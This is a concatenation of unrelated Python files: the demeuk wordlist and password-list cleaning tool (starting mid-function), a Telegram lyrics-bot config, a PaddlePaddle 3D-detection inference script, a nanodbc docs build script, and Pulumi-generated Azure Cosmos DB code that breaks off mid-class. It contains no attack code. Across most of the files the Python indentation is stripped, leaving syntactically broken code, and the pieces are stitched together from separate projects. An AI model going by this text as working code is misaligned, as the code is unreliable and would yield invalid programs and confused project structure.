line (unicode)
Returns
        true if line does not contain an email address
"""
if search(EMAIL_REGEX, line):
return False
else:
return True
def check_non_ascii(line):
"""Checks if a line contains a non ascii chars
Params:
line (unicode)
Returns:
true if line does not contain non ascii chars
"""
try:
line.encode('ascii')
return True
except UnicodeEncodeError:
return False
def clean_cut(line, delimiters, fields):
"""Finds the first delimiter and returns the remaining string either after
or before the delimiter.
Params:
line (unicode)
delimiters list(unicode)
fields (unicode)
Returns:
line (unicode)
"""
for delimiter in delimiters:
if delimiter in line:
if '-' in fields:
start = fields.split('-')[0]
stop = fields.split('-')[1]
if start == '':
start = 1
if stop == '':
stop = len(line)
fields = slice(int(start) - 1, int(stop))
else:
fields = slice(int(fields) - 1, int(fields))
return True, delimiter.join(line.split(delimiter)[fields])
else:
return False, line
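# Hedged examples (not in the original source) of the 'cut' field syntax that clean_cut
# implements; the sample line and field specs below are made up for illustration.
def _example_clean_cut():
    line = 'user:hash:password'
    assert clean_cut(line, [':'], '3') == (True, 'password')         # field N
    assert clean_cut(line, [':'], '2-') == (True, 'hash:password')   # from field N to the end
    assert clean_cut(line, [':'], '-2') == (True, 'user:hash')       # from the start to field M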
def clean_non_ascii(line):
"""Replace non ascii chars with there ascii representation.
Params:
line (Unicode)
Returns:
line (Unicode)
"""
cleaned_line = unidecode(line)
if line != cleaned_line:
return True, cleaned_line
else:
return False, line
def clean_tab(line):
"""Replace tab character with ':' greedy
Params:
line (bytes)
Returns:
line (bytes)
"""
if b'\x09' in line:
line = sub(b'\x09+', b'\x3a', line)
return True, line
else:
return False, line
def clean_hex(line):
"""Converts strings like '$HEX[]' to proper binary
Params:
line (bytes)
Returns
line (bytes)
"""
match = HEX_REGEX.search(line)
if match:
return True, unhexlify(match.group(1))
else:
return False, line
def clean_html(line):
"""Detects html encode chars and decodes them
Params:
line (Unicode)
Returns:
line (Unicode)
"""
return_line = HTML_ENTITY_RE.sub(_unescape_fixup, line)
if return_line != line:
return True, return_line
else:
return False, line
def clean_html_named(line):
"""Detects named html encode chars and decodes them
Params:
line (Unicode)
Returns:
line (Unicode)
"""
return_line = HTML_ENTITY_RE.sub(_unescape_fixup_named, line)
if return_line != line:
return True, return_line
else:
return False, line
def check_controlchar(line):
"""Detects control chars, returns True when detected
Params:
line (Unicode)
Returns:
Status, String
"""
for c in line:
# https://en.wikipedia.org/wiki/Unicode_character_property#General_Category
# Characters (they have meaning):
# Cc -> Control Char (End of stream)
# Cf -> Control flow (right to left)
# Non chars:
# Cn -> Not assigned
# Co -> Private use
# Cs -> Surrogate
if category(c) in ['Cc', 'Cf', 'Cn', 'Co', 'Cs']:
return True, c
return False, None
def try_encoding(line, encoding):
"""Tries to decode a line using supplied encoding
Params:
line (Byte): byte variable that will be decoded
encoding (string): the encoding to be tried
Returns:
False if decoding failed
String if decoding worked
"""
try:
# Try to decode the line
line_decoded = line.decode(encoding)
        # Some encodings will decode almost any line, let's check if we have invalid chars.
# If we have invalid chars (except for tab like chars) we will fail
for c in line_decoded:
if category(c) in ['Cc', 'Cf', 'Cn', 'Co', 'Cs']:
if c == '\t' or c == '\f':
continue
else:
return False
return line_decoded
except UnicodeDecodeError:
return False
def clean_mojibake(line):
"""Detects mojibake and tries to correct it.
    Mojibake are strings that were decoded incorrectly and then re-encoded incorrectly.
    This results in strings like: Ãºnico which should be único.
Param:
line (str)
Returns:
Cleaned string
"""
return_line = fix_encoding(line)
if return_line != line:
return True, return_line
else:
return False, line
def clean_encode(line, input_encoding):
"""Detects and tries encoding
Params:
line (bytes)
Returns:
Decoded UTF-8 string
"""
# Try either a user set of encodings or the default encoding set.
    # When using multiple encodings it is better to have multibyte encodings before
    # single byte encodings. Also it is better to not include ISO encodings by default.
# https://en.wikipedia.org/wiki/Character_encoding#Common_character_encodings
# Input_encoding is by default [utf8]
for encoding in input_encoding:
line_decoded = try_encoding(line, encoding)
if line_decoded is not False:
break
    # All other methods failed, let's run the detect library on the line and try to guess the encoding.
if line_decoded is False:
encode = detect(line)
if encode.get('encoding'):
try:
line_decoded = line.decode(encode['encoding'])
except (UnicodeDecodeError, LookupError) as e: # noqa F841
return False, encode["encoding"]
else:
return False, 'Unknown'
# If we managed to get here, return decode line
return True, line_decoded
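# A hedged illustration of clean_encode (the sample bytes are made up): the configured
# encodings are tried first; only when all of them fail is chardet asked to guess.
def _example_clean_encode():
    ok, text = clean_encode('héllo'.encode('utf-8'), ['UTF-8'])
    assert ok is True and text == 'héllo'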
def clean_up(filename, chunk_start, chunk_size, config):
"""Main clean loop, this calls all the other clean functions.
Args:
line(bytes): Line to be cleaned up
Returns:
(str(Decoded line), str(Failed line))
"""
results = []
log = []
temp_folder = 'demeuk_tmp'
temp_file = md5(filename.encode()).hexdigest()
with open(filename, 'rb') as f:
f.seek(chunk_start)
lines = f.read(chunk_size).splitlines()
for line in lines:
        # Check if the limit is set; if so, decrement it and stop once it reaches 0.
if type(config['limit']) is int:
if config['limit'] > 0:
config['limit'] -= 1
else:
break
        # When stop is set, all remaining demeuk modules will be skipped for this line.
stop = False
if config['verbose']:
log.append(f'----BEGIN---- {hexlify(line)}{linesep}')
        # Replace tab chars with ':' greedily
if config.get('tab') and not stop:
status, line = clean_tab(line)
if status and config['verbose']:
log.append(f'Clean_tab; replaced tab characters; {line}{linesep}')
        # Convert encoding to UTF-8
if config.get('encode') and not stop:
status, line_decoded = clean_encode(line, config.get('input_encoding'))
if status is False:
log.append(f'Clean_encode; decoding error with {line_decoded}; {line}{linesep}')
stop = True
elif status is True and config['verbose']:
log.append(f'Clean_encode; decoded line; {line_decoded}{linesep}')
else:
try:
line_decoded = line.decode(config.get('input_encoding')[0])
if config['verbose']:
log.append(f'Clean_up; decoded using input_encoding option; {line_decoded}{linesep}')
except (UnicodeDecodeError) as e: # noqa F841
log.append(f'Clean_up; decoding error with unknown; {line}{linesep}')
stop = True
# From here it is expected that line is correctly decoded!
# Check if some lines contain a hex string like $HEX[41424344]
if config.get('hex') and not stop:
status, line_decoded = clean_hex(line_decoded)
if status:
                    # Line contains hex; clean_hex returns a binary string, so add it back to
                    # our undecoded lines
lines.append(line_decoded)
if config['verbose']:
log.append(f'Clean_hex; replaced $HEX[], added to queue and quiting; {line}{linesep}')
# Aborting future processing of this line.
stop = True
# Checks if there are any mojibakes inside the line
        # You must fix mojibake before removing control chars! Some control chars
        # are part of a valid mojibake.
if config.get('mojibake') and not stop:
status, line_decoded = clean_mojibake(line_decoded)
if status and config['verbose']:
log.append(f'Clean_mojibake; found a mojibake; {line}{linesep}')
# Checks if there are any control chars inside line
if config.get('check-controlchar') and not stop:
status, cc = check_controlchar(line_decoded)
if status:
# Control char detected
log.append(f'Check_controlchar; found controlchar {cc}; {line_decoded}{linesep}')
stop = True
# Check if there are html char in the line, decode them if there are
if config.get('html') and not stop:
status, line_decoded = clean_html(line_decoded)
if status and config['verbose']:
log.append(f'Clean_html; found html encode character, replaced; {line_decoded}{linesep}')
# Check if there are named html chars in the line
if config.get('html-named') and not stop:
status, line_decoded = clean_html_named(line_decoded)
if status and config['verbose']:
log.append(f'Clean_html_named; found named html character; {line_decoded}{linesep}')
# Should we do the cut?
if config.get('cut') and not stop:
status, line_decoded = clean_cut(line_decoded, config['delimiter'], config['cut-fields'])
if status and config['verbose']:
log.append(f'Clean_cut; field cutted; {line_decoded}{linesep}')
# Replace umlauts
if config.get('umlaut') and not stop:
status, line_decoded = clean_add_umlaut(line_decoded)
if status and config['verbose']:
log.append(f'Clean_umlaut; umlaut replaced; {line_decoded}{linesep}')
# Replace non-ascii
if config.get('non-ascii') and not stop:
status, line_decoded = clean_non_ascii(line_decoded)
if status and config['verbose']:
log.append(f'Clean_non_ascii; non-ascii replaced; {line_decoded}{linesep}')
# Should we remove emails?
if config.get('remove-email') and not stop:
status, line_decoded = remove_email(line_decoded)
if status and config['verbose']:
log.append(f'Remove_email; email found; {line_decoded}{linesep}')
if config.get('googlengram') and not stop:
status, line_decoded = clean_googlengram(line_decoded)
if status and config['verbose']:
log.append(f'Clean_googlengram; tos found and removed; {line_decoded}{linesep}')
if config.get('check-case') and not stop:
status, c = check_case(line_decoded)
if not status:
log.append(f'Check_case; dropped line because of {c}; {line_decoded}{linesep}')
stop = True
if config.get('check-length') and not stop:
if not check_length(line_decoded, min=config['check-min-length'], max=config['check-max-length']):
log.append(f'Check_length; dropped line because of failed length check; {line_decoded}{linesep}')
stop = True
if config.get('check-email') and not stop:
if not check_email(line_decoded):
log.append(f'Check_email; dropped line because found email; {line_decoded}{linesep}')
stop = True
if config.get('check-hash') and not stop:
if not check_hash(line_decoded):
log.append(f'Check_hash; dropped line because found a hash; {line_decoded}{linesep}')
stop = True
if config.get('check-non-ascii') and not stop:
if not check_non_ascii(line_decoded):
log.append(f'Check_non_ascii; dropped line because non ascii char found; {line_decoded}{linesep}')
stop = True
if config.get('remove-punctuation') and not stop:
status, line_decoded = remove_punctuation(line_decoded)
if status and config['verbose']:
log.append(f'Remove_punctuation; punctuation removed; {line_decoded}{linesep}')
# We ran all modules
if not stop:
# Some clean modules will modify the end result; those modifications are added here.
# They are added to the running thread, which might cause one thread to have more work
# than others.
if config.get('add-split'):
modified_lines = add_split(line_decoded)
if modified_lines:
for modified_line in modified_lines:
if config['verbose']:
log.append(f'Add_split; new line because of split; {modified_line}{linesep}')
lines.append(modified_line.encode())
if config.get('add-lower'):
modified_line = add_lower(line_decoded)
if modified_line:
if config['verbose']:
log.append(f'Add_lower; new line; {modified_line}{linesep}')
lines.append(modified_line.encode())
if config.get('add-latin-ligatures'):
modified_line = add_latin_ligatures(line_decoded)
if modified_line:
if config['verbose']:
log.append(f'Add_latin_ligatures; new line; {modified_line}{linesep}')
lines.append(modified_line.encode())
if config.get('add-umlaut'):
status, modified_line = clean_add_umlaut(line_decoded)
if status:
if config['verbose']:
log.append(f'Add_umlaut; new line; {modified_line}{linesep}')
lines.append(modified_line.encode())
if config['verbose']:
log.append(f'----End---- {line_decoded}{linesep}{linesep}')
results.append(f'{line_decoded}{linesep}')
# We made it all the way here, check if we need to flush lines to disk
if len(log) > 10000 or len(results) > 10000:
with open(path.join(temp_folder, f'{temp_file}_{chunk_start}_result.txt'), 'a') as f:
f.write(''.join(results))
# Make sure list is deleted from memory
del results[:]
with open(path.join(temp_folder, f'{temp_file}_{chunk_start}_log.txt'), 'a') as f:
f.write(''.join(log))
# Make sure list is deleted from memory
del log[:]
# Processed all lines, flush everything
with open(path.join(temp_folder, f'{temp_file}_{chunk_start}_result.txt'), 'a') as f:
f.write(''.join(results))
with open(path.join(temp_folder, f'{temp_file}_{chunk_start}_log.txt'), 'a') as f:
f.write(''.join(log))
def chunkify(fname, size=1024 * 1024):
# based on: https://www.blopig.com/blog/2016/08/processing-large-files-using-python/
for filename in glob(fname, recursive=True):
if not path.isfile(filename):
continue
fileend = path.getsize(filename)
with open(filename, 'br') as f:
chunkend = f.tell()
while True:
chunkstart = chunkend
f.seek(size, 1)
f.readline()
chunkend = f.tell()
yield chunkstart, chunkend - chunkstart, filename
if chunkend > fileend:
break
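# Illustrative sketch (not part of the original demeuk flow): a worker such as
# clean_up() is expected to read only the byte range produced by chunkify()
# above. The helper name read_chunk is hypothetical.
def read_chunk(filename, chunk_start, chunk_size):
    # Open in binary mode, jump to the start of the chunk and return the
    # undecoded lines it contains; chunkify() aligns chunk ends to newlines.
    with open(filename, 'rb') as f:
        f.seek(chunk_start)
        return f.read(chunk_size).splitlines()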
def main():
arguments = docopt(cleandoc('\n'.join(__doc__.split('\n')[2:])))
if arguments.get('--version'):
print(f'demeuk - {version}')
exit()
if arguments.get('--input') and arguments.get('--output'):
input_file = arguments.get('--input')
output_file = arguments.get('--output')
else:
print(cleandoc('\n'.join(__doc__.split('\n')[2:])))
exit()
if arguments.get('--log'):
log_file = arguments.get('--log')
else:
log_file = '/dev/null'
if arguments.get('--threads'):
a_threads = arguments.get('--threads')
if a_threads == 'all':
a_threads = cpu_count()
else:
a_threads = int(a_threads)
else:
a_threads = 1
# Let's create the default config
config = {
'input_encoding': ['UTF-8'],
'cut': False,
'delimiter': ':',
'cut-fields': '2-',
'verbose': False,
'limit': False,
# Modify
'encode': True,
'mojibake': True,
'tab': True,
'hex': False,
'html': False,
'html-named': False,
'umlaut': False,
'non-ascii': False,
# Check
'check-length': False,
'check-min-length': 0,
'check-max-length': 0,
'check-controlchar': True,
'check-case': False,
'check-email': False,
'check-hash': False,
'check-non-ascii': False,
# Add
'add-lower': False,
'add-latin-ligatures': False,
'add-split': False,
'add-umlaut': False,
# Remove
'remove-punctuation': False,
'remove-email': False,
}
# Default modules
if arguments.get('--verbose'):
config['verbose'] = True
if arguments.get('--limit'):
config['limit'] = int(arguments.get('--limit'))
if arguments.get('--input-encoding'):
config['input_encoding'] = arguments.get('--input-encoding').split(',')
if arguments.get('--output-encoding'):
setlocale(LC_ALL, arguments.get('--output-encoding'))
else:
setlocale(LC_ALL, 'en_US.UTF-8')
if arguments.get('--cut'):
config['cut'] = True
if arguments.get('--delimiter'):
splitter = ','
if len(arguments.get('--delimiter')) >= 1:
if arguments.get('--delimiter')[0] == ',':
splitter = ';'
config['delimiter'] = arguments.get('--delimiter').split(splitter)
if arguments.get('--cut-before'):
config['cut-fields'] = '-1'
if arguments.get('--cut-fields'):
config['cut-fields'] = arguments.get('--cut-fields')
# Clean / modify modules
if arguments.get('--hex'):
config['hex'] = True
if arguments.get('--html'):
config['html'] = True
if arguments.get('--html-named'):
config['html-named'] = True
if arguments.get('--umlaut'):
config['umlaut'] = True
if arguments.get('--non-ascii'):
config['non-ascii'] = True
# Check modules
if arguments.get('--check-min-length'):
config['check-length'] = True
config['check-min-length'] = int(arguments.get('--check-min-length'))
if arguments.get('--check-max-length'):
config['check-length'] = True
config['check-max-length'] = int(arguments.get('--check-max-length'))
if arguments.get('--check-case'):
config['check-case'] = True
if arguments.get('--check-email'):
config['check-email'] = True
if arguments.get('--check-hash'):
config['check-hash'] = True
if arguments.get('--check-non-ascii'):
config['check-non-ascii'] = True
# Add modules
if arguments.get('--add-lower'):
config['add-lower'] = True
if arguments.get('--add-latin-ligatures'):
config['add-latin-ligatures'] = True
if arguments.get('--add-split'):
config['add-split'] = True
if arguments.get('--add-umlaut'):
config['add-umlaut'] = True
# Remove modules
if arguments.get('--remove-punctuation'):
config['remove-punctuation'] = True
if arguments.get('--remove-email'):
config['remove-email'] = True
# Negative modules
# Check if any disable options are set; they must always overrule any other option.
if arguments.get('--no-mojibake'):
config['mojibake'] = False
if arguments.get('--no-encode'):
config['encode'] = False
if arguments.get('--no-check-controlchar'):
config['check-controlchar'] = False
if arguments.get('--no-tab'):
config['tab'] = False
# Some meta-modules; these overwrite other settings
if arguments.get('--googlengram'):
config['cut'] = False
config['remove-email'] = False
config['encode'] = True
config['mojibake'] = False
config['check-controlchar'] = False
config['tab'] = False
config['googlengram'] = True
print('Main: starting')
if path.isdir('demeuk_tmp'):
rmtree('demeuk_tmp')
mkdir('demeuk_tmp')
pool = Pool(a_threads)
jobs = []
print('Main: starting chunking file.')
for chunk_start, chunk_size, filename in chunkify(input_file):
jobs.append(pool.apply_async(clean_up, (filename, chunk_start, chunk_size, config)))
print('Main: done chunking file.')
print('Main: starting threads.')
for job in jobs:
job.get()
pool.close()
print('Main: threads done. Combining results.')
p_output_file = open(output_file, 'w')
p_log_file = open(log_file, 'w')
for root, directories, files in walk('demeuk_tmp'):
for file_name in files:
if '_log.txt' in file_name:
with open(path.join(root, file_name), 'r') as f:
p_log_file.write(f.read())
if '_result.txt' in file_name:
with open(path.join(root, file_name), 'r') as f:
p_output_file.write(f.read())
p_output_file.close()
p_log_file.close()
rmtree('demeuk_tmp')
if __name__ == "__main__":
main()
|
import os
import time
class Var(object):
# Get a bot token from botfather
BOT_TOKEN = os.environ.get("BOT_TOKEN", "")
# Get from my.telegram.org
API_ID = int(os.environ.get("API_ID", 12345))
# Get from my.telegram.org
API_HASH = os.environ.get("API_HASH", "")
# ID of users that can't use the bot commands
BANNED_USERS = set(
int(x) for x in os.environ.get(
"BANNED_USERS", "").split())
# To record start time of bot
BOT_START_TIME = time.time()
# Genius Api From Here : https://genius.com/api-clients
API = os.environ.get("GENIUS_API", None)
# buttons
PAGENUM = int(os.environ.get("PAGENUM", 20))
class Tr(object):
START_TEXT = """
👋 Hi ! {} Welcome To @PyLyricsBot !
PyLyrics Is An [Open-Source](https://github.com/AmineSoukara/PyLyricsBot/fork) Bot That Can Help You Get Song Lyrics
"""
ABOUT_TEXT = """🤖 **My Name:** [Py Lyrics](t.me/PyLyricsBot)
📝 **Language:** [Python 3](https://www.python.org)
📚 **Framework:** [Pyrogram](https://github.com/pyrogram/pyrogram)
📡 **Hosted On:** [Heroku](heroku.com)
👨💻 **Developer:** [Amine Soukara](t.me/AmineSoukara)
💡 **Source Code:** [Github](https://github.com/AmineSoukara/PyLyricsBot/fork)
👥 **Support Group:** [Damien Help](https://t.me/DamienHelp)
📢 **Updates Channel:** [Damien Soukara](https://t.me/DamienSoukara)
❤ [Donate](https://www.paypal.me/AmineSoukara) (PayPal)
"""
HELP_TEXT = """💡 Just Send Me The Name Of The Song. That's it
❤ [Donate](https://www.paypal.me/AmineSoukara) (PayPal)
"""
ERR_TEXT = "⚠️ Genius API Not Found"
ERRTOKEN_TEXT = "😶 The Access Token Provided Is Expired, Revoked, Malformed Or Invalid For Other Reasons."
NORES = "💬 No Results"
SEARCHING = "🔍 Searching For :"
WAIT = "💬 Please Wait !!"
ARTIST = "🗣 Artist :"
SONG = "🎵 Song :"
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import argparse
import cv2
import paddle
from paddle.inference import Config
from paddle.inference import create_predictor
from smoke.utils.vis_utils import encode_box3d, draw_box_3d
def get_ratio(ori_img_size, output_size, down_ratio=(4, 4)):
return np.array([[down_ratio[1] * ori_img_size[1] / output_size[1],
down_ratio[0] * ori_img_size[0] / output_size[0]]], np.float32)
def get_img(img_path):
img = cv2.imread(img_path)
ori_img_size = img.shape
img = cv2.resize(img, (960, 640))
output_size = img.shape
img = img/255.0
img = np.subtract(img, np.array([0.485, 0.456, 0.406]))
img = np.true_divide(img, np.array([0.229, 0.224, 0.225]))
img = np.array(img, np.float32)
img = img.transpose(2, 0, 1)
img = img[None,:,:,:]
return img, ori_img_size, output_size
def init_predictor(args):
if args.model_dir != "":
config = Config(args.model_dir)
else:
config = Config(args.model_file, args.params_file)
config.enable_memory_optim()
if args.use_gpu:
config.enable_use_gpu(1000, 0)
else:
# If MKL-DNN is not specifically configured, you can still set the number of BLAS threads.
# The thread count should not be greater than the number of cores in the CPU.
config.set_cpu_math_library_num_threads(4)
config.enable_mkldnn()
predictor = create_predictor(config)
return predictor
def run(predictor, img):
# copy img data to input tensor
input_names = predictor.get_input_names()
for i, name in enumerate(input_names):
input_tensor = predictor.get_input_handle(name)
input_tensor.reshape(img[i].shape)
input_tensor.copy_from_cpu(img[i].copy())
# do the inference
predictor.run()
results = []
# get out data from output tensor
output_names = predictor.get_output_names()
for i, name in enumerate(output_names):
output_tensor = predictor.get_output_handle(name)
output_data = output_tensor.copy_to_cpu()
results.append(output_data)
return results
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"--model_file",
type=str,
default="./inference.pdmodel",
help="Model filename, Specify this when your model is a combined model."
)
parser.add_argument(
"--params_file",
type=str,
default="./inference.pdiparams",
help=
"Parameter filename, Specify this when your model is a combined model."
)
parser.add_argument(
"--model_dir",
type=str,
default="",
help=
"Model dir, If you load a non-combined model, specify the directory of the model."
)
parser.add_argument(
'--input_path',
dest='input_path',
help='The image path',
type=str,
required=True)
parser.add_argument(
'--output_path',
dest='output_path',
help='The result path of image',
type=str,
required=True)
parser.add_argument("--use_gpu",
type=int,
default=0,
help="Whether use gpu.")
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
pred = init_predictor(args)
K = np.array([[[2055.56, 0, 939.658], [0, 2055.56, 641.072], [0, 0, 1]]], np.float32)
K_inverse = np.linalg.inv(K)
img_path = args.input_path
img, ori_img_size, output_size = get_img(img_path)
ratio = get_ratio(ori_img_size, output_size)
results = run(pred, [img, K_inverse, ratio])
total_pred = paddle.to_tensor(results[0])
keep_idx = paddle.nonzero(total_pred[:, -1] > 0.25)
total_pred = paddle.gather(total_pred, keep_idx)
if total_pred.shape[0] > 0:
pred_dimensions = total_pred[:, 6:9]
pred_dimensions = pred_dimensions.roll(shifts=1, axis=1)
pred_rotys = total_pred[:, 12]
pred_locations = total_pred[:, 9:12]
bbox_3d = encode_box3d(pred_rotys, pred_dimensions, pred_locations, paddle.to_tensor(K), (1280, 1920))
else:
bbox_3d = total_pred
img_draw = cv2.imread(img_path)
for idx in range(bbox_3d.shape[0]):
bbox = bbox_3d[idx]
bbox = bbox.transpose([1,0]).numpy()
img_draw = draw_box_3d(img_draw, bbox)
cv2.imwrite(args.output_path, img_draw)
|
# Build the documentation for nanodbc library
# Configuration
nanodbc_name = 'nanodbc'
nanodbc_versions = ['master', '2.13.0']
# End of Configuration
import errno
import os
import sys
from subprocess import check_call, CalledProcessError, Popen, PIPE
def build_docs(**kwargs):
assert nanodbc_versions
version = kwargs.get('version', nanodbc_versions[0])
doc_dir = kwargs.get('doc_dir', os.path.dirname(
os.path.realpath(__file__)))
work_dir = kwargs.get('work_dir', '.')
include_dir = kwargs.get('include_dir', os.path.join(
os.path.dirname(doc_dir), 'nanodbc'))
doxyxml_dir = os.path.join(work_dir, 'doxyxml')
doxyfile = r'''
PROJECT_NAME = {0}
GENERATE_XML = YES
GENERATE_HTML = NO
GENERATE_LATEX = NO
INPUT = {1}
JAVADOC_AUTOBRIEF = YES
AUTOLINK_SUPPORT = NO
XML_OUTPUT = {2}
MACRO_EXPANSION = YES
PREDEFINED = DOXYGEN=1
'''.format(nanodbc_name, include_dir, doxyxml_dir).encode('UTF-8')
cmd = ['doxygen', '-']
p = Popen(cmd, stdin=PIPE)
p.communicate(input=doxyfile)
if p.returncode != 0:
raise CalledProcessError(p.returncode, cmd)
html_dir = os.path.join(work_dir, 'html')
versions = nanodbc_versions
assert versions
check_call(['sphinx-build',
'-Dbreathe_projects.format=' + os.path.abspath(doxyxml_dir),
'-Dversion=' + version, '-Drelease=' + version,
'-Aversion=' + version, '-Aversions=' + ','.join(versions),
'-b', 'html', doc_dir, html_dir])
try:
check_call(['lessc', '--clean-css',
'--include-path=' + os.path.join(doc_dir, 'bootstrap'),
os.path.join(doc_dir, 'nanodbc.less'),
os.path.join(html_dir, '_static', 'nanodbc.css')])
except OSError as err:
if err.errno != errno.ENOENT:
raise
print('lessc (http://lesscss.org/) not found')
sys.exit(1)
return html_dir
if __name__ == '__main__':
#create_build_env()
build_docs()
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['SqlResourceSqlStoredProcedure']
class SqlResourceSqlStoredProcedure(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
container_name: Optional[pulumi.Input[str]] = None,
database_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
options: Optional[pulumi.Input[pulumi.InputType['CreateUpdateOptionsArgs']]] = None,
resource: Optional[pulumi.Input[pulumi.InputType['SqlStoredProcedureResourceArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
stored_procedure_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
An Azure Cosmos DB storedProcedure.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: Cosmos DB database account name.
:param pulumi.Input[str] container_name: Cosmos DB container name.
:param pulumi.Input[str] database_name: Cosmos DB database name.
:param pulumi.Input[str] location: The location of the resource group to which the resource belongs.
:param pulumi.Input[pulumi.InputType['CreateUpdateOptionsArgs']] options: A key-value pair of options to be applied for the request. This corresponds to the headers sent with the request.
:param pulumi.Input[pulumi.InputType['SqlStoredProcedureResourceArgs']] resource: The standard JSON format of a storedProcedure
:param pulumi.Input[str] resource_group_name: Name of an Azure resource group.
:param pulumi.Input[str] stored_procedure_name: Cosmos DB storedProcedure name.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Tags are a list of key-value pairs that describe the resource. These tags can be used in viewing and grouping this resource (across resource groups). A maximum of 15 tags can be provided for a resource. Each tag must have a key no greater than 128 characters and value no greater than 256 characters. For example, the default experience for a template type is set with "defaultExperience": "Cassandra". Current "defaultExperience" values also include "Table", "Graph", "DocumentDB", and "MongoDB".
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__['account_name'] = account_name
if container_name is None and not opts.urn:
raise TypeError("Missing required property 'container_name'")
__props__['container_name'] = container_name
if database_name is None and not opts.urn:
raise TypeError("Missing required property 'database_name'")
__props__['database_name'] = database_name
__props__['location'] = location
if options is None and not opts.urn:
raise TypeError("Missing required property 'options'")
__props__['options'] = options
if resource is None and not opts.urn:
raise TypeError("Missing required property 'resource'")
__props__['resource'] = resource
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['stored_procedure_name'] = stored_procedure_name
__props__['tags'] = tags
__props__['name'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:documentdb/v20191212:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb/latest:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb/latest:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb/v20190801:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb/v20190801:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb/v20200301:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb/v20200301:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb/v20200401:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb/v20200401:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb/v20200601preview:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb/v20200601preview:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb/v20200901:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb/v20200901:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb/v20210115:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb/v20210115:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-native:documentdb/v20210301preview:SqlResourceSqlStoredProcedure"), pulumi.Alias(type_="azure-nextgen:documentdb/v20210301preview:SqlResourceSqlStoredProcedure")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(SqlResourceSqlStoredProcedure, __self__).__init__(
'azure-native:documentdb/v20191212:SqlResourceSqlStoredProcedure',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'SqlResourceSqlStoredProcedure':
"""
Get an existing SqlResourceSqlStoredProcedure resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["location"] = None
__props__["name"] = None
__props__["resource"] = None
__props__["tags"] = None
__props__["type"] = None
return SqlResourceSqlStoredProcedure(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
The location of the resource group to which the resource belongs.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the ARM resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def resource(self) -> pulumi.Output[Optional['outputs.SqlStoredProcedureGetPropertiesResponseResource']]:
return pulumi.get(self, "resource")
@property
@pulumi.getter
